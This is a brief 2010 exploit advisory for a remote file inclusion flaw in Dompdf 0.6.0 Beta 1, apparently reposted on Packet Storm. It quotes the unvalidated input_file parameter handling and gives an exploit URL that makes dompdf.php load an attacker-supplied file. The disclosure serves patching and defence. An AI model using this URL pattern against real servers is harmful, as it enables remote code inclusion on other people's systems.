Dompdf version 0.6.0 Beta 1 suffers from a remote file inclusion vulnerability.
65ce155bec2ac26b202f7b878a5116a3==================================
apps dompdf RFI Vulnerability
==================================
====================================================
[x] ExpL0it TitLe : apps dompdf RFI Vulnerability
[x] DatE : 01 September 2010
[x] AutH0r : Andre_Corleone
[x] Software Link : www.digitaljunkies.ca/dompdf/
[x] h0mE : http://tecon-crew.org
[x] TestEd 0n : linux ubuntu 10.04
[x] d0rK : :P
====================================================
==========================================================================================
[x]bug heRe:
if ( isset($_GET["input_file"]) )
$file = rawurldecode($_GET["input_file"]);
else
throw new DOMPDF_Exception("An input file is required (i.e. input_file _GET variable).");
==========================================================================================
==================================================================
[x]expL0iT:
http://www.site.com/dompdf/dompdf.php?input_file=[evilc0de.txt?]
==================================================================
============================================================================================
[x]th4nKs t0:
ALLAH SWT,Muhammad SAW,my Parents,my lovely HerliZ Dian Permathasari
guitariznoize | zee_eichel | jImMYrOmAnTiCdEvIl | 45tr0_k1ll1n9 | all Tecon Crew | and you
============================================================================================
=====================
[x]Jakarta,Indonesia
=====================
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!